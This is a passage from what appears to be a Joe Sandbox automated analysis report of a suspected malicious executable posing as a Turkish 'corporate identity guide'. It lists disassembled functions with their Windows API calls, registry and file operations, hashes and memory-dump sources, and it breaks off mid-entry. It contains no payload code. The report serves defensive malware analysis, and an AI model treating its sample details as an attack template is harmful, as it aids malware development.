                                                                                                                                                                                          • Instruction ID: 81d983181078a42bdaaa38d141d1896fcab4c42a172a92442cc7f35772e796f5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 724b08e39b448c58c7649a37dc1be8b90ebc0ba8e0923a3b5611d97535f2409a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E018431200709EBDF205F51DDD4A5B7B25EB84794F50507BFA00751D0D7BA8C929E2E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00402032 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040205D
                                                                                                                                                                                            • Part of subcall function 00405322: lstrlenW.KERNEL32(0042C228,00000000,0041DA00,76FC23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                                                                                                                                                            • Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,0042C228,00000000,0041DA00,76FC23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                                                                                                                                                            • Part of subcall function 00405322: lstrcatW.KERNEL32(0042C228,0040327A), ref: 0040537D
                                                                                                                                                                                            • Part of subcall function 00405322: SetWindowTextW.USER32(0042C228,0042C228), ref: 0040538F
                                                                                                                                                                                            • Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                                                                                                                                                            • Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                                                                                                                                                            • Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                                                                                                                                                                          • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 0040206E
                                                                                                                                                                                          • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020EB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 334405425-0
                                                                                                                                                                                          • Opcode ID: feecde648e4e86c349c2181d42606f42c320c3d08ea0eac6231e50817e8518ef
                                                                                                                                                                                          • Instruction ID: 732860e23109d101385e559ec06a1cde6071cd761d8e517fa4c79c7f2b675a05
                                                                                                                                                                                          • Opcode Fuzzy Hash: feecde648e4e86c349c2181d42606f42c320c3d08ea0eac6231e50817e8518ef
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4421B031D00205EACF20AFA5CE48A9E7A70BF04358F64413BF511B51E0DBBD8981DA6E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00401B77 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GlobalFree.KERNEL32(00825A20), ref: 00401BE7
                                                                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF9
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Global$AllocFree
                                                                                                                                                                                          • String ID: Call
                                                                                                                                                                                          • API String ID: 3394109436-1824292864
                                                                                                                                                                                          • Opcode ID: f905998698a718dc4cf1a42dfb633cd665eb9fc086c23fd15b54cbfec95e9be3
                                                                                                                                                                                          • Instruction ID: fc266f0b09462df108d5b450fd3a6dc377bab1f5c412968f7868140de6343470
                                                                                                                                                                                          • Opcode Fuzzy Hash: f905998698a718dc4cf1a42dfb633cd665eb9fc086c23fd15b54cbfec95e9be3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4521A572610100EBCB10EB94DEC995E73A9EB49318B25013FF106F32D0DBB9A8519BAD
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004024F8 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
                                                                                                                                                                                          • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 0040253E
                                                                                                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsq53F5.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Enum$CloseValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 397863658-0
                                                                                                                                                                                          • Opcode ID: a7693fd32bbd6dda220c639d5c72a78338338ff509cc745735d7ea4ec565f031
                                                                                                                                                                                          • Instruction ID: be079dd98ee366e8112d1373a1392f52e75f7f4d5f65991111ca301d6a19f001
                                                                                                                                                                                          • Opcode Fuzzy Hash: a7693fd32bbd6dda220c639d5c72a78338338ff509cc745735d7ea4ec565f031
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E018471904204BFEB149F95DE88ABF7ABCEF80358F14403EF505B61D0DAB85E419B69
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00402484 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024B5
                                                                                                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsq53F5.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseQueryValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3356406503-0
                                                                                                                                                                                          • Opcode ID: 28dfcfb9a6f44a18c58c8206a7dfe2bd09e3a5ae6e90a5253dfd418af8ae02c6
                                                                                                                                                                                          • Instruction ID: 794a7caf9ed311c3342b46d24488b6d71e3894ac8d4f1441d9e09f9d9ce2e922
                                                                                                                                                                                          • Opcode Fuzzy Hash: 28dfcfb9a6f44a18c58c8206a7dfe2bd09e3a5ae6e90a5253dfd418af8ae02c6
                                                                                                                                                                                          • Instruction Fuzzy Hash: A411A731D14205EBDF14DFA4CA585AE77B4EF44348F21843FE445B72C0D6B89A41EB59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                          • Opcode ID: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                                                                                                                                                                          • Instruction ID: eaafb4699c1cdf5c6f59fde68eca766a765a16907ebce13606274643e5ac5f14
                                                                                                                                                                                          • Opcode Fuzzy Hash: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D0128316242209FE7095B789D05B6A3698E710715F14463FF851F62F1D678CC429B4C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040238E Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 004023B9
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseDeleteValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2831762973-0
                                                                                                                                                                                          • Opcode ID: 49dd4a4acbc57048e4a2cad6fc2e9fcf4131624f7ebcfe3fd0f4b4026ebfb941
                                                                                                                                                                                          • Instruction ID: 2791961e855c801182d2f4b3e101f078c994d4f4985963d794b0561754721dd9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 49dd4a4acbc57048e4a2cad6fc2e9fcf4131624f7ebcfe3fd0f4b4026ebfb941
                                                                                                                                                                                          • Instruction Fuzzy Hash: E6F09632E045119BE704BBA49B8EABE72A89B44354F29403FFE42F71C1CAF85D41676D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00401E49 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                                                                                                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$EnableShow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1136574915-0
                                                                                                                                                                                          • Opcode ID: 476e1375ed2ebf99e134ffac4da93d8f4435b4a70c73a61f3ceb60b83f009d87
                                                                                                                                                                                          • Instruction ID: 8ee55578b336c0276868c1e88f1fd45be51d25fee0972e3c110634e7b38d832d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 476e1375ed2ebf99e134ffac4da93d8f4435b4a70c73a61f3ceb60b83f009d87
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8BE01A72E082008FE724ABA5AA495AD77B8EB90325B20847FE211F11D1DA7858419F69
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406694 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                                                                                                                                                                            • Part of subcall function 00406624: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040663B
                                                                                                                                                                                            • Part of subcall function 00406624: wsprintfW.USER32 ref: 00406676
                                                                                                                                                                                            • Part of subcall function 00406624: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040668A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2547128583-0
                                                                                                                                                                                          • Opcode ID: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                                                                                                                                          • Instruction ID: 155b38c425e345f43688a0673e138072f65e923c2ca09dacbbabb210d44f0fbf
                                                                                                                                                                                          • Opcode Fuzzy Hash: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 50E0863250461156D31197709E4487762EC9B95750307483EF946F2091DB399C36A66D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00405DB0 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
                                                                                                                                                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$AttributesCreate
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 415043291-0
                                                                                                                                                                                          • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                                                                                                                          • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                                                                                                                                                          • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00405D8B Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,00405990,?,?,00000000,00405B66,?,?,?,?), ref: 00405D90
                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405DA4
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                          • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                                                                                                                          • Instruction ID: fe430eedc911e7c92ce83e5abbc00e08444bb0e311ec0623c818608bfa408f6d
                                                                                                                                                                                          • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1BD0C972504420ABD2512728AF0C89BBB95DB542717028B39FAA9A22B0CB304C568A98
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040586E Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,00403382,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76FC3420,004035D9,?,00000006,00000008,0000000A), ref: 00405874
                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405882
                                                                                                                                                                                          Memory Dump Source
